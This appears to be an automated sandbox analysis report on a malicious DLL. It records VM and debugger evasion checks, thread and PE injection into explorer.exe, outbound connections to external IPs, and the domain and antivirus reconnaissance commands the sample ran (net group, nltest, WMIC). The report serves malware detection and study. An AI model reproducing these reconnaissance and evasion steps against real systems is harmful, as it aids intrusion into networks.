Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\whoami.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\whoami.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\explorer.exe

Code function: 8_2_0E4576DC rdtsc

8_2_0E4576DC

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\explorer.exe

Code function: 8_2_0E454948 CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,OpenProcess,StrStrIA,StrStrIA,StrStrIA,TerminateProcess,CloseHandle,Process32Next,CloseHandle,

8_2_0E454948

Contains functionality to query network adapater information

Source: C:\Windows\System32\rundll32.exe	Code function: GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo,	3_2_000001CEAFC94D00
Source: C:\Windows\System32\rundll32.exe	Code function: GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo,	4_2_0000027619644D00
Source: C:\Windows\System32\rundll32.exe	Code function: GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo,	6_2_000002339FBA4D00
Source: C:\Windows\explorer.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,	8_2_03038424
Source: C:\Windows\explorer.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,	8_2_03037274
Source: C:\Windows\explorer.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,	8_2_08387274
Source: C:\Windows\explorer.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,	8_2_08388424
Source: C:\Windows\explorer.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,	8_2_08857274
Source: C:\Windows\explorer.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,	8_2_08858424

Contains functionality to read device registry values (via SetupAPI)

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00007FF8A8CFDCBC WTSGetActiveConsoleSessionId,WTSEnumerateSessionsW,WTSFreeMemory,WTSQueryUserToken,GetLastError,SetupDiGetClassDevsW,GetLastError,SetupDiGetDeviceInstanceIdW,GetLastError,StrStrIW,SetupDiGetDeviceRegistryPropertyW,lstrcmpiW,CM_Get_DevNode_Status,SetupDiOpenDevRegKey,RegCloseKey,SetupDiEnumDeviceInfo,SetupDiDestroyDeviceInfoList,CloseHandle,

3_2_00007FF8A8CFDCBC

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 2241	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 526	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 6837	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 879	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 876	Jump to behavior

Found evasive API chain checking for process token information

Source: C:\Windows\System32\rundll32.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Found large amount of non-executed APIs

Source: C:\Windows\System32\rundll32.exe

API coverage: 3.7 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\loaddll64.exe TID: 5856	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6448	Thread sleep count: 2241 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6448	Thread sleep time: -2241000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1276	Thread sleep count: 526 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1276	Thread sleep time: -52600s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6448	Thread sleep count: 6837 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6448	Thread sleep time: -6837000s >= -30000s	Jump to behavior

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Queries the current domain controller via net

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D72E90 swprintf,swprintf,FindFirstFileW,GetLastError,swprintf,FindNextFileW,CompareFileTime,FindNextFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,swprintf,swprintf,FindClose,	3_2_00007FF8A8D72E90
Source: C:\Windows\explorer.exe	Code function: 8_2_0303A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,	8_2_0303A8E0
Source: C:\Windows\explorer.exe	Code function: 8_2_03032B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	8_2_03032B28
Source: C:\Windows\explorer.exe	Code function: 8_2_030404C0 FindFirstFileW,	8_2_030404C0
Source: C:\Windows\explorer.exe	Code function: 8_2_0838A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,	8_2_0838A8E0
Source: C:\Windows\explorer.exe	Code function: 8_2_083904C0 FindFirstFileW,	8_2_083904C0
Source: C:\Windows\explorer.exe	Code function: 8_2_08382B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	8_2_08382B28
Source: C:\Windows\explorer.exe	Code function: 8_2_0885A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,	8_2_0885A8E0
Source: C:\Windows\explorer.exe	Code function: 8_2_088604C0 FindFirstFileW,	8_2_088604C0
Source: C:\Windows\explorer.exe	Code function: 8_2_08852B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	8_2_08852B28
Source: C:\Windows\explorer.exe	Code function: 8_2_0E456604 lstrcpyA,lstrlenA,lstrcatA,lstrcatA,FindFirstFileA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,StrStrIA,lstrcpyA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	8_2_0E456604
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4516F4 FindFirstFileW,FindNextFileW,LoadLibraryW,	8_2_0E4516F4
Source: C:\Windows\explorer.exe	Code function: 8_2_0E515C40 FindFirstFileW,FindClose,	8_2_0E515C40
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4F50D8 FindFirstFileA,	8_2_0E4F50D8
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4F5088 CloseHandle,GetCurrentProcessId,FindFirstFileA,FindClose,GetFileSize,	8_2_0E4F5088

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00007FF8A8CF9A80 GetSystemInfo,

3_2_00007FF8A8CF9A80

Source: C:\Windows\System32\loaddll64.exe

Thread delayed: delay time: 120000

Jump to behavior

Source: explorer.exe, 00000008.00000000.2321862445.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
Source: explorer.exe, 00000008.00000003.3094423766.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0r
Source: explorer.exe, 00000008.00000003.3856101577.0000000009C93000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000008.00000003.3094423766.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
Source: explorer.exe, 00000008.00000003.3857371736.000000000354D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: explorer.exe, 00000008.00000000.2320112731.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE44B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE44B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE44B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617CE6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D0E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617D0E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E11E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2511990228.000002339E1B9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E1B9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000006.00000003.2511990228.000002339E1B9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E1B9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWf
Source: rundll32.exe, 00000004.00000002.4536038404.0000027617C68000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE3A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`
Source: explorer.exe, 00000008.00000003.3220487882.0000000008920000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: explorer.exe, 00000008.00000003.3094423766.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000008.00000003.3094423766.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000008.00000003.3094423766.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTcaVMWare
Source: explorer.exe, 00000008.00000003.3856101577.0000000009C93000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000008.00000003.3102516031.000000000C8DC000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \Device\HarddiskVolume1\??\Volume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:o_
Source: explorer.exe, 00000008.00000003.3857371736.000000000354D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000008.00000000.2321862445.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
Source: explorer.exe, 00000008.00000003.3857371736.000000000354D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000008.00000003.3857371736.000000000354D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware,p
Source: explorer.exe, 00000008.00000003.3094423766.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
Source: explorer.exe, 00000008.00000000.2320112731.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000008.00000003.3094423766.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000008.00000000.2321862445.000000000769A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\explorer.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\explorer.exe

Code function: 8_2_0E4576DC rdtsc

8_2_0E4576DC

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_000001CEAFC7CCE0 LdrGetProcedureAddress,

3_2_000001CEAFC7CCE0

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00007FF8A8DB8990 GetLastError,IsDebuggerPresent,OutputDebugStringW,

3_2_00007FF8A8DB8990

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00007FF8A8DB8990 GetLastError,IsDebuggerPresent,OutputDebugStringW,

3_2_00007FF8A8DB8990

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\explorer.exe

Code function: 8_2_0E454948 CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,OpenProcess,StrStrIA,StrStrIA,StrStrIA,TerminateProcess,CloseHandle,Process32Next,CloseHandle,

8_2_0E454948

Contains functionality to dynamically determine API calls

Source: C:\Windows\explorer.exe

Code function: 8_2_0E4589E4 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,

8_2_0E4589E4

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00007FF8A8D68920 swprintf,OpenMutexW,swprintf,GetProcessHeap,HeapFree,

3_2_00007FF8A8D68920

Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8DCCFD8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00007FF8A8DCCFD8
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D96264 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00007FF8A8D96264
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4E1DA0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_0E4E1DA0
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4F53A8 SetUnhandledExceptionFilter,	8_2_0E4F53A8

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 104.21.68.89 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 172.67.217.190 443	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Network Connect: 103.57.249.207 6542	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Network Connect: 94.232.43.224 6542	Jump to behavior

Allocates memory in foreign processes

Source: C:\Windows\System32\rundll32.exe	Memory allocated: C:\Windows\explorer.exe base: 3030000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Memory allocated: C:\Windows\explorer.exe base: 8380000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Memory allocated: C:\Windows\explorer.exe base: 8850000 protect: page execute and read and write	Jump to behavior

Contains functionality to inject threads in other processes

Source: C:\Windows\System32\rundll32.exe	Code function: 3_3_00007DF4A9FC0100 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,	3_3_00007DF4A9FC0100
Source: C:\Windows\System32\rundll32.exe	Code function: 4_3_00007DF4051C0100 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,	4_3_00007DF4051C0100
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_00007DF445320100 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,	6_3_00007DF445320100

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\rundll32.exe	Thread created: C:\Windows\explorer.exe EIP: 3030000	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread created: C:\Windows\explorer.exe EIP: 8380000	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread created: C:\Windows\explorer.exe EIP: 8850000	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Windows\System32\rundll32.exe	Memory written: C:\Windows\explorer.exe base: 3030000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Memory written: C:\Windows\explorer.exe base: 8380000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Memory written: C:\Windows\explorer.exe base: 8850000 value starts with: 4D5A	Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\rundll32.exe	Memory written: PID: 1028 base: 3030000 value: 4D	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Memory written: PID: 1028 base: 8380000 value: 4D	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Memory written: PID: 1028 base: 8850000 value: 4D	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 412	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 412	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 412	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 412	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 412	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 4084	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 4084	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 4084	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 4084	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 4084	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 412	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 412	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 412	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 412	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 412	Jump to behavior

Sets debug register (to hijack the execution of another thread)

Source: C:\Windows\System32\rundll32.exe

Thread register set: 412 1

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\System32\rundll32.exe	Memory written: C:\Windows\explorer.exe base: 3030000	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Memory written: C:\Windows\explorer.exe base: 8380000	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Memory written: C:\Windows\explorer.exe base: 8850000	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\wait.dll.dll",#1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami /groups

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00007FF8A8CF9AC0 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,

3_2_00007FF8A8CF9AC0

Source: explorer.exe, 00000008.00000000.2323476795.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3103191493.0000000009BB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd=
Source: explorer.exe, 00000008.00000002.4537142552.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2320547106.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000008.00000000.2321695887.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4537142552.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2320547106.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000008.00000002.4537142552.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2320547106.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000008.00000002.4537142552.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2320547106.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000008.00000000.2320112731.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4535485561.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PProgman

Queries device information via Setup API

Source: C:\Windows\System32\rundll32.exe

3_2_00007FF8A8CFDCBC

Source: C:\Windows\explorer.exe

Code function: 8_2_0E4D4F14 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

8_2_0E4D4F14

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_000001CEAFC94D00 GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo,

3_2_000001CEAFC94D00

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00007FF8A8DE4A20 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

3_2_00007FF8A8DE4A20

Source: C:\Windows\explorer.exe

Code function: 8_2_0303891C RtlGetVersion,GetVersionExW,

8_2_0303891C

Source: C:\Windows\System32\nltest.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

